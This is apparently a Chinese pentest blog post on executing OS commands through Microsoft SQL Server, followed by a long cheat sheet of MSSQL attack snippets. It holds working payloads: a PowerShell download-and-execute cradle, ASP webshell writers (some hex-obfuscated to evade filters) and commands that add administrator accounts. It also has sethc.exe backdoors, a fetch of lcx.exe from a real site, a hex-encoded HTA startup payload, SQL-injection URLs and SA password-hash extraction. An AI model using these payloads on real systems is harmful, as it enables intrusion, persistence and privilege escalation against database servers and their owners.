justincom
justincom

Exec OS Command Via MSSQL

今天遇到了,就mark一下

0x00 简介

渗透测试过程中,大家经常会碰到通过MSSQL来进行提权或执行系统命令之类的操作,通常我们经常会使用xp_cmdshell来进行执行系统命令,但是当xp_cmdshell不能使用的时候,我们还有什么别的方式么?本文将介绍与分享一下我自己学到的一些姿势。

0x01 常用的一些姿势

1. XP_CMDSHELL

这个大家都比较熟悉了,通过xp_cmdshell来执行命令,可使用以下语句来执行:

exec master..xp_cmdshell "whoami"

默认情况下xp_cmdshell 是禁止的,如下图:

这个时候,可以使用以下命令进行开启:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

关闭一样,只是将上面的后面的那个"1"改成"0"就可以了。
开启以后,则可执行系统命令

如果xp_cmdshell被删除,可以尝试上传xplog70.dll进行恢复,恢复语句:

Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'

2. SP_OACREATE

当xp_cmdshell 删除以后,可以使用SP_OACreate。
首先要打开组件:

EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'show advanced options', 0;

之后使用以下语句执行命令:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\temp\\1.txt'

>这里要注意一下,此方式执行是无回显的

3. 自启动

以下方式需要电脑重启。
添加注册表:

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','exec','REG_SZ','ipconfig'

备份添加启动项:

alter database test set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)
create table cmd (a image)--  (新建立一个cmd表)
backup database test  to disk = 'D:\\temp\\cmd'  WITH init --
backup log test to disk = 'D:\\temp\\cmd1'  WITH init --  (减少备分数据的大小)
insert into cmd (a) values (0x0a406563686f206f66660d0a406563686f206f66660d0a40636d642e657865202f63206563686f2077686f616d69203e643a5c74656d705c332e7478740d0a40636d642e657865202f63206563686f2077686f616d69203e643a5c74656d705c332e7478740d0a400d0a40)
-- (插入cmd命令)
backup log test to disk = 'C:\\Documents and Settings\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat'-- (备分日志到启动路径)
drop table cmd --(删除新建的cmd表)
alter database test set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)

>测试发现,Win10+MSSQL 2012导出的批处理并不能顺利执行,可能与系统及数据库版本有一定关系,成功率并不怎么高。

4. 通过沙盒执行命令

开启沙盒:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行命令:

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')

0x02 通过Agent Job执行命令

此种方式适用于服务器开启了MSSQL Agent Job服务,并且服务器中当前运行的用户账号拥有足够的权限去创建并执行代理作业的情况。
利用代码如下:

USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';

关于此种方式已经有文章进行介绍,有兴趣可以阅读一下。戳我

0x03 SQL Server CLR

这种方式是最近才学到的,也是本文重点介绍的一种姿势。
Microsoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。对于 SQL Server 用户和应用程序开发人员来说,CLR 集成意味着您现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。
要通过此种方式来执行命令,也有几个前提:
1、在SQL Server上能启用CLR并可以创建自定义存储过程
2、SQL Server当前账号具有执行命令/代码所需要的权限
创建CLR有两种方式:
方式一:使用DLL文件进行创建

CREATE ASSEMBLY AssemblyName from ‘DLLPath’

方式二:使用文件16进制流进行创建

CREATE ASSEMBLY AssemblyName from 文件十六进制流

对于做渗透的我们,当然是没有文件是最好的方式了,因此,本文主要介绍方式二。以下为详细测试步骤:
1、安装Visual Studio和SQL Server数据库,此次测试使用了VS2015跟SQL2012。
2、创建一个新的SQL Server数据库项目

3、设置项目属性,目标平台修改为需要的目标平台,如SQL Server 2012; 将SQLCLR权限级别修改为UNSAFE;修改.Net 框架版本为自己需要的版本;语言选择C#

4、右键项目,选择添加->新建项,新建SQL CLR C# 存储过程


5、填入以下测试代码:

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;

public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void SqlStoredProcedure1 ()
    {
        // 在此处放置代码
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        process.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
        process.StartInfo.FileName = "cmd.exe";
        process.StartInfo.Arguments = "/C whoami > d:\\temp\\1.txt";
        process.Start();
    }
}

6、填入代码以后进行编译,之后到编译目录下可以看到一个dacpac后缀的文件。

7、双击此文件进行解压,将解压出一个名为mode.sql的文件。
8、执行SQL文件中的以下语句

CREATE ASSEMBLY [ExecCode]
    AUTHORIZATION [dbo]
    FROM 0x4D5A[...snip...]
    WITH PERMISSION_SET = UNSAFE;

之后执行:

CREATE PROCEDURE [dbo].[SqlStoredProcedure1]
AS EXTERNAL NAME [ExecCode].[StoredProcedures].[SqlStoredProcedure1]

9、开启数据库服务器配置选项clr enabled

EXEC sp_configure N'show advanced options', N'1' 
RECONFIGURE WITH OVERRIDE
--开启clr enabled 选项
EXEC sp_configure N'clr enabled', N'1'
RECONFIGURE WITH OVERRIDE 
--关闭所有服务器配置选项
EXEC sp_configure N'show advanced options', N'0' 
RECONFIGURE WITH OVERRIDE
--如果存在权限问题,执行下面一段脚本
alter database [master] set TRUSTWORTHY on
EXEC sp_changedbowner 'sa'

10、执行命令:

EXEC [dbo].[SqlStoredProcedure1];

>如果没成功,可以换个数据库试试看。

11、删除存储过程

DROP PROCEDURE [dbo].[SqlStoredProcedure1];
DROP ASSEMBLY ExecCode;

0x04 PowerUpSQL

当然针对SQL Server的攻击,有一个强大的工具PowerUpSQL,里面也有很多针对MSSQL的攻击方式。下面介绍两种比较实用的方式。

1. SP_Addextendedproc

套件中的Create-SQLFileXpDll方法,在这里对其使用方式简单的进行一下介绍。
创建DLL:

PS C:\Users\Evi1cg\Desktop\PowerUpSQL> . .\PowerUpSQL.ps1
PS C:\Users\Evi1cg\Desktop\PowerUpSQL> Create-SQLFileXpDll -OutFile D:\temp\exec.dll -Command "echo Exec test > D:\temp\
test.txt" -ExportName xp_test

SQL Server 通过 sp_addextendedproc 调用DLL从而达到命令执行的效果。这里有两种方式导入:

//via local disk
sp_addextendedproc 'xp_test', 'D:\temp\exec.dll'
//via UNC path:
sp_addextendedproc 'xp_test', '\\servername\pathtofile\exec.dll'

导入之后的可调用xp_test来执行命令:

exec master..xp_test;

通过以下命令可以卸载:

sp_dropextendedproc 'xp_test'

2. SMB Relay Attacks

针对这种方式,已经有文章总结了,这里就不多做介绍了,详细请看这里。

0x05 小结

本文就通过SQL Server 执行系统命令进行了一下小结,当然方式可能不全,仅仅是自己知道的一些方法,还希望大牛别喷,如果您有什么更加新颖的方法,欢迎补充,希望本文对你有所帮助。

0x06 参考

1.http://bobao.360.cn/learning/detail/3070.html
2.https://www.mssqltips.com/sqlservertip/2087/how-to-execute-a-dos-command-when-xpcmdshell-is-disabled-in-sql-server/
3.http://blog.csdn.net/tjvictor/article/details/4726933
4.https://www.mssqltips.com/sqlservertip/1662/writing-to-an-operating-system-file-using-the-sql-server-sqlclr/
5.https://www.t00ls.net/viewthread/23198.html?amp;extra=page%3D1%26amp%3Bfilter%3Dtype%26amp%3Btypeid%3D39

 

 

 

 

 

 

 

 

 

 

 

 

 

下边是小冰总结的,感谢冰总

 

 

SQL Server存储过程

Xp_availablemedia          显示机器上有用的驱动器 
xp_enumgroups              列出当前系统的使用群组及其说明
Xp_dirtree                 允许获得一个目录树 
Xp_enumdsn                 列举服务器上的ODBC数据源 
Xp_loginconfig             获取服务器安全信息 
Xp_makecab                 允许用户在服务器上创建一个压缩文件 
Xp_ntsec_enumdomains       列举服务器可以进入的域 
Xp_terminate_process       提供进程的进程ID,终止此进程 
xp_servicecontrol          允许用户启动,停止服务
xp_regread                 存储过程修改注册表
xp_getfiledetails          获取某文件的相关属性

判断组件是否存在

SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell'

基本信息查询

;declare @d int //判断mssql支持多行语句查询
and (select count(1) from [sysobjects])>=0 //是否支持子查询
and 1=convert (int,db_name())  当前数据库名
and db_name(1-7)>0 暴所有数据库名
and 1=(select @@servername)  //本地服务名
and 1=(select HAS_DBACCESS('master'))  是否有数据库读取权限
0=(SELECT top 1 cast([name] as nvarchar(256)) char(94) cast([filename] as nvarchar(256)) from (select top 3 dbid,name,filenmae from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid]desc)--

恢复sp_addextendedproc

Use master
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc

sp_addextendedproc恢复各种扩展

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regread ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll'

利用xp_makecab、xp_unpackcab配合404页面,获取路径!

Url;Exec master..xp_makecab 'C:\WINDOWS\Help\iisHelp\common\404b.cab', 'mszip', 1, 'C:\WINDOWS\Help\iisHelp\common\404b.htm'

--先备份404b.htm页面

Url;Exec master..xp_makecab 'C:\WINDOWS\Help\iisHelp\common\metabase.cab', 'mszip', 1, 'C:\WINDOWS\system32\inetsrv\MetaBase.xml'

--备份metabase.xml文件到C:\WINDOWS\Help\iisHelp\common\目录

Url;exec master..xp_unpackcab 'C:\WINDOWS\Help\iisHelp\common\metabase.cab','C:\WINDOWS\Help\iisHelp\common\',1,'404b.htm'
--将MetaBase.bin从C:\WINDOWS\Help\iisHelp\common\metabase.cab中解压出来,并重命名为404b.htm

然后我们访问该站不存在的文件名,就可以利用404b文件帮我们列出文件内容了。

Url;exec master..xp_cmdshell 'net user>C:\WINDOWS\Help\iisHelp\common\404b.htm'--

利用BULK来读取文件

drop table [nspcn]
CREATE TABLE [nspcn](ResultTxt nvarchar(1024) NULL)
BULK INSERT [nspcn] FROM 'c:\boot.ini' WITH (KEEPNULLS)
insert into [nspcn] values ('g_over');Alter Table [nspcn] add id int NOT NULL IDENTITY (1,1)
select * from [nspcn]

drop table [nspcn]
CREATE TABLE [nspcn](ResultTxt nvarchar(1024) NULL)
BULK INSERT [nspcn] FROM 'C:\Windows\system32\inetsrv\MetaBase.xml' WITH (KEEPNULLS)
insert into [nspcn] values ('g_over');Alter Table [nspcn] add id int NOT NULL IDENTITY (1,1)
select * from [nspcn]
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'e:\2.asp', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

加sa账号

Url;exec master.dbo.sp_addlogin username,password--
Url;exec master.dbo.sp_addsrvrolemember username,sysadmin--

提升SQL用户权限

exec master.dbo.sp_configure 'allow updates', 1;RECONFIGURE WITH OVERRIDE; update sysxlogins set xstatus=18 where name='x'--

MSsql2005中启用xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 
dbcc addextendedproc("xp_cmdshell","xplog70.dll") 


EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;--

SA权限下的执行命令

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'

;xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','black','REG_SZ','net user xiaobing xiaobing /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'regread',null,'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'regwrite',null,'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'c:\windows\system32\taskmgr.exe',REG_SZ

declare @shell int exec sp_oacreate 'Shell.Application',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'

declare @shell int exec sp_oacreate 'Shell.Application',@shell output exec sp_oamethod @shell,'ShellExecute',null,'SAUU.vbs','','c:\','','1'
sauu.vbs为天津管理员账号的vbs脚本放在c盘根目录下

declare @js int
EXEC sp_OACreate 'ScriptControl',@js OUT
EXEC sp_OASetProperty @js, 'Language', 'JavaScript'
EXEC sp_OAMethod @js, 'Eval', NULL, 'var o=new ActiveXObject("Shell.Users");z=o.create("iishelp");z.changePassword("123456","");z.setting("AccountType")=3;'

Url;exec master.dbo.xp_cmdshell 'net user 123 123 /add';--

Url;exec sp_makewebtask 'E:\wwwroot\DianCMS\1\bing.asp',' select ''<%25execute(request("a"))%25>'' ';--

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123 123 /add' 

exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'

nc -vv -l -p 50
Url;exec master..xp_cmdshell 'mstsc -v:远程ip:50'--

exec master.dbo.xp_subdirs 'c:\'   列目录

写一句话木马

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\2.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<%execute(request("a"))%>'

防注入写法

declare @a int,@b int,@c varchar(255),@d varchar(255),@e varchar(255),@f varchar(255),@g varchar(255),@h varchar(255),@i varchar(255),@j varchar(255);
set @c=0x6D61737465722E2E73705F6F61637265617465;
set @d=0x6D61737465722E2E73705F6F616D6574686F64;
set @e=0x536372697074696E672E46696C6573797374656D4F626A656374;
set @f=0x4372656174655465787446696C65;
set @g=0x433A5C496E65747075625C73797374656D2E617370;
set @h=0x74727565;
set @i=0x7772697465;
set @j=0x3C256576616C20726571756573742822582229253E;
exec @c @e,@a output;
exec @d @a,@f,@b output,@g,@h;
exec @d @b,@i,null,@j

恢复cmdshell防注入

declare @a varchar(255),@b varchar(255),@c varchar(255);
set @a=0x6D61737465722E2E73705F616464657874656E64656470726F63;
set @b=0x78705F636D647368656C6C;
set @c=0x78706C6F6737302E646C6C;
exec @a @b,@c

导出文件的存储过程

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINdows\system32\cmd.exe /c netstat -an >c:\1.txt'

SA沙盒模式提权

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--


Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user itpro gmasfm /add")');

利用xp_readerrorlog来读取文件

EXEC [master].[dbo].[xp_readerrorlog] 1,'d:\cmd.asp'

xp_regwrite写注册表,替换sethc.exe实现提权

xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\taskmgr.exe'

过滤了xp_cmdshell等关键字提交方法语句

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user c xiaobing /add'

复制

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

列目录 db权限?

exec master..xp_dirtree 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动',1,1

sa下载文件

declare @b varbinary(8000),@hr int,@http int,@down int 
exec sp_oacreate [microsoft.xmlhttp],@http output exec @hr = sp_oamethod @http,[open],null,[get],[http://www.jestina.co.kr/UpData/Popup/lcx.exe],0  
exec @hr = sp_oamethod @http,[send],null 
exec @hr=sp_oagetproperty @http,[responsebody],@b output 
exec @hr=sp_oacreate [adodb.stream],@down output 
exec @hr=sp_oasetproperty @down,[type],1  
exec @hr=sp_oasetproperty @down,[mode],3  
exec @hr=sp_oamethod @down,[open],null 
exec @hr=sp_oamethod @down,[write],null,@b  
exec @hr=sp_oamethod @down,[savetofile],null,[d:\RECYCLER\l.exe],1;

查看命令执行结果

drop table black;create TABLE black (result varchar(7996) NULL, ID int NOT NULL IDENTITY (1,1))--
;insert into black exec master..xp_cmdshell 'ipconfig /all'--
and (select result from black where id=1)>0--

sa建立用户

DECLARE @o int
DECLARE @z int
EXEC sp_OACreate 'Shell.Users',@o OUT
EXEC sp_OAMethod @o, 'Create', @z OUT, '11111'
EXEC sp_OASetProperty  @z, 'setting', 3 , 'AccountType'
EXEC sp_OAMethod @z, 'ChangePassword',NULL , '123456', ''

导出注册表

1、drop table [regdir];create table [regdir](value nvarchar(1000) null,data nvarchar(1000) null)--


2、delete [regdir];insert [regdir]exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port'

创建sp_readtextfile存储过程

Create proc sp_readTextFile @filename sysname
as

  begin
  set nocount on
  Create table #tempfile (line varchar(8000))
  exec ('bulk insert #tempfile from "' + @filename + '"')
  select * from #tempfile
  drop table #tempfile
End
go

然后利用它读文件

exec sp_readTextFile 'c:\boot.ini'

清除MsSql日志

set nocount on 
declare @logicalfilename sysname,
@maxminutes int,
@newsize int

停掉或激活某个服务

exec master..xp_servicecontrol 'stop','sharedaccess'
exec master..xp_servicecontrol 'start','sharedaccess'

列出驱动器的名称

EXEC [master].[dbo].[xp_availablemedia]

列出指定目录的所有下一级子目录

EXEC [master].[dbo].[xp_subdirs] 'c:\windows'

列出当前错误日志的具体内容

EXEC [master].[dbo].[xp_readerrorlog]

列出当前计算机名称

execute master..xp_getnetname

列出当前计算机的驱动器可用空间

execute master..xp_fixeddrives

列出服务器所有本地组

execute master..xp_enumgroups

获取MS SQL的版本号

execute master..sp_msgetversion

列目录

参数说明:目录名,目录深度,是否显示文件==
execute master..xp_dirtree 'c:' 
execute master..xp_dirtree 'c:',1 
execute master..xp_dirtree 'c:',1,1
dbcc addextendedproc ('xp_regread','xpstar.dll')

dbcc addextendedproc ('xp_regwrite','xpstar.dll')

找文件:

http://localhost/index.asp?id=1;drop table tmp;create table tmp([id] [int] IDENTITY (1,1) NOT NULL,[name] [nvarchar] (300) NOT NULL,[depth] [int] NOT NULL,[isfile] [nvarchar] (50) NULL) insert into tmp exec master..xp_dirtree 'E:\',0,1--

declare @id int,@depth int,@name nvarchar(300) set @name='index.asp' set @id=(select top 1 id from tmp where isfile=1 and name=@name) set @depth=(select top 1 depth from tmp where isfile=1 and name=@name) while @depth<>1 begin set @id=(select top 1 id from tmp where isfile=0 and id<@id and depth=(@depth-1) order by id desc) set @depth=(select depth from tmp where id=@id) set @name=(select name from tmp where id=@id)+'\'+@name end update tmp set name=@name where id=1--

http://localhost/index.asp?id=1 and (select name from tmp where id=1)>0--

查找目录:

http://localhost/index.asp?id=1;drop table tmp;create table tmp([id] [int] IDENTITY (1,1) NOT NULL,[name] [nvarchar] (300) NOT NULL,[depth] [int] NOT NULL);insert into tmp exec master..xp_dirtree 'c:\inetpub',0,0--

declare @id int,@depth int,@name nvarchar(300) set @name='1' set @id=(select top 1 id from tmp where name=@name) set @depth=(select top 1 depth from tmp where name=@name) while @depth<>1 begin set @id=(select top 1 id from tmp where id<@id and depth=(@depth-1) order by id desc) set @depth=(select depth from tmp where id=@id) set @name=(select name from tmp where id=@id)+'\'+@name end update tmp set name=@name where id=1--
http://localhost/index.asp?id=1 and (select name from tmp where id=1)>0--
1' and 1=2 union select 1,0x130A0D0A2D2D213E3C736372697074206C616E67756167653D56425363726970743E6F6E206572726F7220726573756D65206E6578743A646174613D2277696E646F772E6D6F7665546F20343030302C343030303A77696E646F772E726573697A65546F20302C303A643D2222312E62617422223A77697468204372656174654F626A656374282222536372697074696E672E46696C6553797374656D4F626A6563742222292E6F70656E7465787466696C6528642C322C74727565293A2E77726974656C696E652022226e6574207573657220787824207869616f62696e6762696e67202f616464266e6574206c6f63616c67726f75702061646d696e6973747261746f727320787824202f61646422223A2E77726974656C696E6520222263642025414C4C555345525350524F46494C452522223A2E77726974656C696E652022223A676F22223A2E77726974656C696E6520222264656C202F73202A2E687461262664656C20253022223A2E77726974656C696E65202222676F746F20676F22223A2E636C6F73653A456E6420776974683A4372656174654F626A656374282222575363726970742E5368656C6C2222292E72756E20642C303A77696E646F772E636C6F7365223A65786563757465207265706C616365287265706C61636528646174612C2240222C225322292C2280222C225322293C2F7363726970743E3C212D2D130A0D0A,3,4,5,6,7,8,9,10,11,12 into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\yy.hta"#

SA密码
select password from master.dbo.sysxlogins where name='sa'   2000

select password from master.dbo.sql_logins where name='sa'   2005

Hash 总共94位 分4段 前6位为常量,接着8位是Salt部分,接下来是40位的大写字母密文,最后40位是混合密文  
明文密码全是数字、纯大写字母、数字+大写字母 经过pwdencrypt()加密得到的Hash的混合密文和大写字母密文相同 --------------------------------------------------2010年3月黑x档案

------------------------------db权限成功率很小----------------------------------
use msdb exec sp_delete_job null,'x'
exec sp_add_job 'x'
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user xiao /add'
exec sp_add_jobserver NULL,'x',@@servername exec sp_start_job 'x'

use msdb exec sp_delete_job null,'jktest1'
EXEC sp_add_job @job_name='jktest1',@enabled = 1,@delete_level = 1
EXEC sp_add_jobstep @job_name='jktest1',@step_name = 'ExeC my sql',@subsystem = 'TSQL',
@CommAnd = 'exeC master..xp_exeCresultSet N''seleCt ''''exeC master..xp_Cmdshell "net user a /add"'''''',N''Master'''
EXEC sp_add_jobServer @job_name = 'jktest1',
@Server_name = 'XIAOBING-50320F'  
EXEC sp_start_job @job_name = 'jktest1'

读文件

第一种:利用XP_CMDSHELL

create table hack..tmp(str nvarchar(800))

insert into hack..tmp exec master..xp_cmdshell 'type c:\boot.ini'

drop table tmp

第二种:利用OLE对象接口

create table hack..tmp(str nvarchar(800))

declare @o int,@f int,@str nvarchar(4000)

exec sp_oacreate 'scripting.filesystemobject",@o out;

exec sp_oamethod @o,"opentextfile",@f out,"c:\boot.ini",1;

exec sp_oamethod @f,"readall",@str out;

insert into hack..tmp values(@str)

drop table tmp    

第三种:BULK INSERT

create table hack..tmp (str nvarchar(800))

bulk insert hack..tmp from 'c:\boot.ini'

drop table tmp

第四种:扩展存储过程xp_readerrorlog

create table hack..tmp(str nvarchar(800),row int)

insert into tmp exec master..xp_readerrorlog 1,'c:\boot.ini'

drop table tmp

     上面的四种方法都是将c:\boot.ini中的数据写入了临时表hack中

PUBLIC权限
xp_getfiledetails
获取指定文件的详细信息,如大小、创建日期。
exec master..xp_getfiledetails 'c:\boot.ini'

xp_ntsec_enumdomains
获取服务器名
exec master..xp_ntsec_enumdomains

xp_fileexist
判断目录/文件是否存在
exec master..xp_fileexist 'c:\boot.ini'

xp_msver
获取系统信息
exec master.dbo.xp_msver

SA权限
Xp_availablemedia
列举可用的系统分区
Exec xp_availablemedia

Xp_enumgroups
列举系统中的用户组
Exec xp_enumgroup

Xp_makecab
将制定的多个文件压缩到一个档案中
Exec xp_makecab ‘c:\1.cab’,MSZIP,1,’c:\boot.ini’,1

Xp_unpackcab
解压档案
Exec xp_unpackcab ‘c:\1.cab’,’c:\tmp’,1

Xp_servicecontrol
控制指定服务

Exec xp_servicecontrol ‘pause’,’schedul’

Exec xp_servicecontrol ‘start’,’schedul’

Exec xp_servicecontrol ‘stop’,’schedul’
Use www.xianzhi.com;–(这里是随便选的一个数据库)
  drop table cmd;
  create table cmd (a text);
  BULK INSERT cmd
  FROM ‘d:/freehos/webshell.cc.asp’
  WITH (
  FIELDTERMINATOR = ‘n’,
  ROWTERMINATOR = ‘nn’
  )
  select * from cmd
  这样就成功读出了d:/freehos/xianzhi.asp

加管理员

declare @a int;exec master..sp_oacreate 'ScriptControl',@a output;exec master..sp_oasetproperty @a,'language','VBScript';exec master..sp_oamethod @a,'addcode',null,'sub add():Set o=CreateObject("Shell.Users"):Set u=o.create("Bloodsword$"):u.ChangePassword "0kee","":u.setting("AccountType")=3:end sub';exec master..sp_oamethod @a,'run',null,'add'

你可能感兴趣的:(数据库知识)

  • 数据库知识点 (笑)z 数据库
    SQLite相关命令.tables:查看数据库中的表.headerson/off:开启或关闭表头显示.modecolumn:设置输出模式为列对齐.width列宽1列宽2:这个命令实际上是.width列名1列宽1列名2列宽2,用于设置特定列的宽度.schema表名:查看表的结构SQLite的SQL语句基本数据类型INTEGER:整形REAL:浮点型TEXT:文本类型,字符串NULL:空SQL操作增,
  • Java-后端程序员个人知识总结 金肴羽 java开发语言
    文章目录概要1.编程语言2.数据结构与算法3.数据库知识4.框架和库5.服务器管理6.网络知识7.版本控制8.测试9.安全知识10.系统设计11.编码规范与最佳实践12.持续学习和适应能力概要后端程序员,主要负责应用程序的逻辑、数据库交互、服务器配置以及应用的性能优化等。成为一名优秀的后台程序员,需要掌握以下技能:1.编程语言掌握至少一种后台编程语言JavaPythonHtmlJavaScript
  • MySQL数据库学习笔记,知识点和案例整理,期末三天复习完【简单且详细】 编程ID 数据库mysql数据库知识点复习学习笔记
    MySQL数据库近三万字学习笔记,超级详细!文章目录MySQL数据库近三万字学习笔记,超级详细!前言一、day1二、day2三、day3前言MySQL数据库知识点和案例总结,非常详细,将近三万字!分成了三天去消化吸收!一、day1MySQL1、sql、DB、DBMS分别是什么,他们之间的关系?DB:DataBase(数据库,数据库实际上在硬盘上以文件的形式存在)DBMS:DataBaseManag
  • C、C++编程学习资料收藏 勇往直前996 C++学习C编程Linux应用数据库数据结构
    怎么算入门,我觉得可以入手做一些项目就算入门了。需要掌握至少一门编程语言,例如,C/C++或者Java;需要学习数据结构与算法,至少掌握常见的数据结构与算法;需要学习数据库知识,因为做项目几乎离不开数据库,数据库必须掌握;掌握一门技能,例如后端开发、web开发、移动端开发、人工智能等;当然还需要进一步精进,可以学习操作系统,计算机网络,计算机组织原理、汇编等相关专业课程。C语言刚开始就是泡书,然后
  • mysql数据库知识点 轩昂7K 关系型数据库mysql数据库
    mysql数据库了解数据库:database数据库是持久存储有组织可共享数据的容器,冗余度(重复性)低,易扩展,有较高的独立性,采用特定的数据类型(整形、浮点型、字符串类型-char、varchar或者text(文本类型),和专二不太一样字符串类型)数据库模型的分类:层次模型以树形结构表示实体和实体之间联系的数据模型简单,但结构不灵活,不能表达复杂模型网状模型能表达复杂关系,但结构复杂,使用不易不
